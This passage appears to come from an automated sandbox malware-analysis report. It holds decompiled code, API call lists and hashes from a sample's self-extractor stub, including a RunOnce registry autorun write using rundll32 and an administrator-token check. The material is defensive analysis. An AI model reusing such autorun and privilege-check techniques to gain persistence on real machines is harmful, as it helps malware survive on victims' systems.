                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                      							E000E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                      							E000E658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                      								E000E658A(_t61, _t63, _v276);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0xe1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      											_t45 = _v280;
                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                      											E000E1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								RegCloseKey(_v284);
                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      0x000e27e3
                                                                                                                                                                                                      0x000e27e3
                                                                                                                                                                                                      0x000e27ec
                                                                                                                                                                                                      0x000e27f8
                                                                                                                                                                                                      0x000e2803
                                                                                                                                                                                                      0x000e280b
                                                                                                                                                                                                      0x000e2831
                                                                                                                                                                                                      0x000e28c3
                                                                                                                                                                                                      0x000e28c9
                                                                                                                                                                                                      0x000e28cd
                                                                                                                                                                                                      0x000e2837
                                                                                                                                                                                                      0x000e285a
                                                                                                                                                                                                      0x000e285c
                                                                                                                                                                                                      0x000e2865
                                                                                                                                                                                                      0x000e2892
                                                                                                                                                                                                      0x000e2895
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2867
                                                                                                                                                                                                      0x000e2878
                                                                                                                                                                                                      0x000e288c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e287a
                                                                                                                                                                                                      0x000e2880
                                                                                                                                                                                                      0x000e2885
                                                                                                                                                                                                      0x000e2897
                                                                                                                                                                                                      0x000e2899
                                                                                                                                                                                                      0x000e2899
                                                                                                                                                                                                      0x000e2878
                                                                                                                                                                                                      0x000e2865
                                                                                                                                                                                                      0x000e28a0
                                                                                                                                                                                                      0x000e28bf
                                                                                                                                                                                                      0x000e28c1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e28c1
                                                                                                                                                                                                      0x000e2831
                                                                                                                                                                                                      0x000e27dd
                                                                                                                                                                                                      0x000e27d5
                                                                                                                                                                                                      0x000e28e5

APIs
• CharUpperA.USER32(B7C20988,00000000,00000000,00000000), ref: 000E27A8
• CharNextA.USER32(0000054D), ref: 000E27B5
• CharNextA.USER32(00000000), ref: 000E27BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2829
• RegQueryValueExA.ADVAPI32(?,000E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E28A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000E28AA
• GetSystemDirectoryA.KERNEL32 ref: 000E28B9
Strings
• Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000E27E4
Memory Dump Source
• Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
• Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: 636706413ec252f421ccf2d0f6456d4ac65ee4d5d324f6074bef9591d2a84066
• Instruction ID: ec9d4fbd372a6fdc3fc0a2a26ecafe10f3706ae62d1537e41dec9cfda9d960ca
• Opcode Fuzzy Hash: 636706413ec252f421ccf2d0f6456d4ac65ee4d5d324f6074bef9591d2a84066
• Instruction Fuzzy Hash: 6241F571A001ACAFEB249B659C85AFE7BBCEF59700F0040A9F549F2101CB749EC58FA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
E000E2267() {
	signed int _v8;
	char _v268;
	char _v836;
	void* _v840;
	int _v844;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t19;
	intOrPtr _t33;
	void* _t38;
	intOrPtr* _t42;
	void* _t45;
	void* _t47;
	void* _t49;
	signed int _t51;

	_t19 =  *0xe8004; // 0xb7c20988
	_t20 = _t19 ^ _t51;
	_v8 = _t19 ^ _t51;
	if( *0xe8530 != 0) {
		_push(_t49);
		if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
			_push(_t38);
			_v844 = 0x238;
			if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
				_push(_t47);
				memset( &_v268, 0, 0x104);
				if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
					E000E658A( &_v268, 0x104, 0xe1140);
				}
				_push("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
				E000E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
				_t42 =  &_v836;
				_t45 = _t42 + 1;
				_pop(_t47);
				do {
					_t33 =  *_t42;
					_t42 = _t42 + 1;
				} while (_t33 != 0);
				RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
			}
			_t20 = RegCloseKey(_v840);
			_pop(_t38);
		}
		_pop(_t49);
	}
	return E000E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
}
                                                                                                                                                                                                      0x000e234c
                                                                                                                                                                                                      0x000e234e
                                                                                                                                                                                                      0x000e234f
                                                                                                                                                                                                      0x000e236e
                                                                                                                                                                                                      0x000e236e
                                                                                                                                                                                                      0x000e237a
                                                                                                                                                                                                      0x000e2380
                                                                                                                                                                                                      0x000e2380
                                                                                                                                                                                                      0x000e2381
                                                                                                                                                                                                      0x000e2381
                                                                                                                                                                                                      0x000e238f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000E22A3
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 000E22D8
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E22F5
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E2305
                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 000E236E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000E237A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 000E232D
                                                                                                                                                                                                      • wextract_cleanup2, xrefs: 000E227C, 000E22CD, 000E2363
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 000E2299
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 000E2321
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                      • API String ID: 3027380567-3029760535
                                                                                                                                                                                                      • Opcode ID: 522a9f56be2d71bcac67cc9ea8f6f73d941cceb62d1b7c206cee63c1478ecb08
                                                                                                                                                                                                      • Instruction ID: 23a2a9a291f69125aa33043616e20eee8e905ca94ad239d3f843e39d79e539f0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 522a9f56be2d71bcac67cc9ea8f6f73d941cceb62d1b7c206cee63c1478ecb08
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7731C871A002986FDB619B62DC89FEA777CEB15740F0401E9B50DBA051DA756F88CF50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                      			E000E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					if( *0xe8590 == 0) {
                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                      						 *0xe8590 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                      					E000E43D0(_t33, _t16);
                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0xe8d4c);
                                                                                                                                                                                                      					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                      					 *0xe88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E000E30C0);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                      			}










APIs
• EndDialog.USER32(?,00000000), ref: 000E313B
• GetDesktopWindow.USER32 ref: 000E314B
• SetDlgItemTextA.USER32(?,00000834), ref: 000E316A
• SetWindowTextA.USER32(?,cent), ref: 000E3176
• SetForegroundWindow.USER32(?), ref: 000E317D
• GetDlgItem.USER32(?,00000834), ref: 000E3185
• GetWindowLongA.USER32(00000000,000000FC), ref: 000E3190
• SetWindowLongA.USER32(00000000,000000FC,000E30C0), ref: 000E31A3
• SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000E31CA
Strings
Memory Dump Source
• Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
• Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: cent
• API String ID: 3785188418-3940384054
• Opcode ID: 03709a0320ed9502f6b402c20557ef58390ebf147c6feb551dd57f28547e117a
• Instruction ID: cbe5cd12f4d0c3470e976697412bda3190702c6ce5b145da4b0b2e536eec326f
• Opcode Fuzzy Hash: 03709a0320ed9502f6b402c20557ef58390ebf147c6feb551dd57f28547e117a
• Instruction Fuzzy Hash: AE11E4313042D1BFEB205F259C4CB5A3EA4EB4BB21F014658F925BA1E0DB78A741C742
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E000E18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                      				_t23 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                      				_t25 =  *0xe8128; // 0x2
                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					return E000E6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E000E17EE( &_v20) != 0) {
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                      						 *0xe8128 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe8128 = 1;
                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x000e196e
                                                                                                                                                                                                      0x000e1970
                                                                                                                                                                                                      0x000e1999
                                                                                                                                                                                                      0x000e199c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e199c
                                                                                                                                                                                                      0x000e1972
                                                                                                                                                                                                      0x000e1972
                                                                                                                                                                                                      0x000e1975
                                                                                                                                                                                                      0x000e1984
                                                                                                                                                                                                      0x000e1985
                                                                                                                                                                                                      0x000e198a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e198c
                                                                                                                                                                                                      0x000e1991
                                                                                                                                                                                                      0x000e1996
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1996
                                                                                                                                                                                                      0x000e194c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000E18DD), ref: 000E181A
                                                                                                                                                                                                        • Part of subcall function 000E17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 000E182C
                                                                                                                                                                                                        • Part of subcall function 000E17EE: AllocateAndInitializeSid.ADVAPI32(000E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000E18DD), ref: 000E1855
                                                                                                                                                                                                        • Part of subcall function 000E17EE: FreeSid.ADVAPI32(?,?,?,?,000E18DD), ref: 000E1883
                                                                                                                                                                                                        • Part of subcall function 000E17EE: FreeLibrary.KERNEL32(00000000,?,?,?,000E18DD), ref: 000E188A
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 000E18EB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 000E18F2
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 000E190A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000E1918
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 000E192C
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 000E1944
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 000E1964
                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 000E197A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 000E199C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 000E19A3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000E19AD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                      • Opcode ID: 378c83bd835b3fc03a8d6b48a8364a2e07d4b310c1af2f92eeb9dbfc33c3fae9
                                                                                                                                                                                                      • Instruction ID: 43448f48ed2cfb857c00b2b216f7d9419cc718385e7bd9c96e85a94d7afe375d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 378c83bd835b3fc03a8d6b48a8364a2e07d4b310c1af2f92eeb9dbfc33c3fae9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B316D71A00289AFEB609FA6DC88AFFBBBCFF49B10F104429E545F6161D7349905CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E000E468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: TITLE$cent
                                                                                                                                                                                                      • API String ID: 3370778649-3553536280
                                                                                                                                                                                                      • Opcode ID: dd81736bac8592e86a4c7f54c8570518c3994deecb16ab2413661d980ff7799f
                                                                                                                                                                                                      • Instruction ID: c3579f994210c5a3fee3d2bc05d28e4f3321df3adcf63007898a3deea0c0f234
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd81736bac8592e86a4c7f54c8570518c3994deecb16ab2413661d980ff7799f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA01D1363402807FF3201BA66C8CF2B7E6CDBCFF62F054014FA49BA190C9A5984482B3
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                      			E000E17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                      				if(_t36 != 0) {
